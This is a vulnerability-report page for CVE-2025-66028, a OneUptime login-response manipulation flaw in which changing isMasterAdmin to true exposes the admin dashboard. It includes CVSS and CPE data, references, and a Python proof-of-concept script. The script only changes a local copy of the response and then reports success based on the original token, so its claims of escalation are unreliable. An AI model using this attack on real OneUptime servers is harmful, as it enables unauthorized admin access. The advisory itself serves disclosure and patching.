Security Vulnerability Report
CVE-2025-66028 CVSS 8.2 HIGH

Published: 2025-11-26 19:15:52
Last Modified: 2025-12-05 13:57:23

Description

OneUptime is a solution for monitoring and managing online services. Prior to version 8.0.5567, OneUptime is vulnerable to privilege escalation via Login Response Manipulation. During the login process, the server response included a parameter called isMasterAdmin. By intercepting and modifying this parameter value from false to true, it is possible to gain access to the admin dashboard interface. However, an attacker may be unable to view or interact with the data if they still do not have sufficient permissions. This issue has been patched in version 8.0.5567.

CVSS Details

CVSS Score: 8.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:hackerbay:oneuptime:*:*:*:*:*:*:*:* - VULNERABLE
OneUptime < 8.0.5567

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import json

# CVE-2025-66028 PoC - OneUptime Privilege Escalation via Login Response Manipulation
# Target: OneUptime < 8.0.5567

TARGET_URL = "https://vulnerable-server.com"
LOGIN_ENDPOINT = f"{TARGET_URL}/api/account/login"
DASHBOARD_ENDPOINT = f"{TARGET_URL}/api/admin/dashboard"


def exploit_privilege_escalation(username, password):
    """
    Exploit the login response manipulation vulnerability to gain admin access.

    Steps:
    1. Send normal login request
    2. Intercept and modify the response
    3. Change isMasterAdmin from false to true
    4. Access admin dashboard with elevated privileges
    """
    # Step 1: Normal login request
    login_data = {
        "email": username,
        "password": password
    }

    try:
        # Send login request (in real attack, use proxy to intercept)
        response = requests.post(LOGIN_ENDPOINT, json=login_data, verify=False)

        if response.status_code == 200:
            login_result = response.json()

            # Step 2: Modify the response - this is where the vulnerability lies
            # In real attack, intercept using Burp Suite/ZAP and change:
            # "isMasterAdmin": false -> "isMasterAdmin": true
            print("[*] Original response:", json.dumps(login_result, indent=2))

            # Simulating modified response (in practice, modify at proxy level)
            modified_result = login_result.copy()
            modified_result["isMasterAdmin"] = True
            print("[+] Modified response:", json.dumps(modified_result, indent=2))
            print("[+] isMasterAdmin changed to: True")

            # Step 3: Use the modified response to access admin resources
            # In practice, use the modified session/token to access admin endpoints
            admin_check = requests.get(
                DASHBOARD_ENDPOINT,
                headers={"Authorization": f"Bearer {login_result.get('token', '')}"}
            )

            if admin_check.status_code == 200:
                print("[+] Successfully accessed admin dashboard!")
                print("[+] Privilege escalation successful")
                return True

    except requests.RequestException as e:
        print(f"[-] Error: {e}")

    return False


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-66028 OneUptime Privilege Escalation PoC")
    print("=" * 60)

    # Replace with valid credentials
    username = "[email protected]"
    password = "userpassword"

    exploit_privilege_escalation(username, password)
```

References

https://github.com/OneUptime/oneuptime/commit/3e72b2a9a4f50f98cf1f6cf13fa3e405715bb370 (Patch)
https://github.com/OneUptime/oneuptime/security/advisories/GHSA-675q-66gf-gqg8 (Exploit, Vendor Advisory)

Additional NVD Data

Vulnerability Status: Analyzed
Weakness: CWE-284 (Improper Access Control)
CVSS v3.1 (Primary): 8.2 HIGH (exploitability score 3.9, impact score 4.2)
CVSS v4.0 (Secondary): 6.9 MEDIUM
CVSS v4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Affected CPE: cpe:2.3:a:hackerbay:oneuptime:*:*:*:*:*:*:*:* (versionEndExcluding 8.0.5567, matchCriteriaId E9E265FD-6677-423D-A90A-15BC6B5763EC)